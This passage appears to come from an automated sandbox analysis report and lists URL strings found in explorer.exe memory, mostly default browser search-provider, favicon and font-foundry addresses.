            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302140897.0000000012B70000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
            Source: explorer.exe, 00000001.00000000.1302140897.0000000012B70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
            Source: explorer.exe, 00000001.00000000.1288482274.0000000004970000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
            Source: explorer.exe, 00000001.00000000.1293534027.0000000007B03000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmp | String found in binary or memory: http://www.recherche.aol.fr/
